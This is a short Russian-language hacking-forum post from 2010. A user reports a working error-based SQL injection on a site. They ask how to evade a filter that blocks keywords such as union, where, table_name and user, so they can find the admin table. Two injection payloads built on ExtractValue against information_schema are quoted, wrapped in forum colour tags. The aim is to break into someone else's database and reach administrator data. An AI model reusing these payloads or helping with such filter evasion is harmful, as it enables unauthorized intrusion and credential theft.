04.07.2010, 19:58
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
38021
Репутация:
3
|
|
Есть SQL-INJ
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]ExtractValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x5c[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]select version[/COLOR][COLOR="#007700"]())))--+[/COLOR][/COLOR]
фильтруются слова union|where|table_name|user|column_name|, самое главное это table_name, какими способами возможно обойти фильтр на слово table_name, ибо узнать таблицу с админа не как не удается..
делал
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]ExtractValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x5c[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]select unhex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x7461626C655F6E616D65[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables limit 16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])))--+[/COLOR][/COLOR]
результата не дало.. |
|
|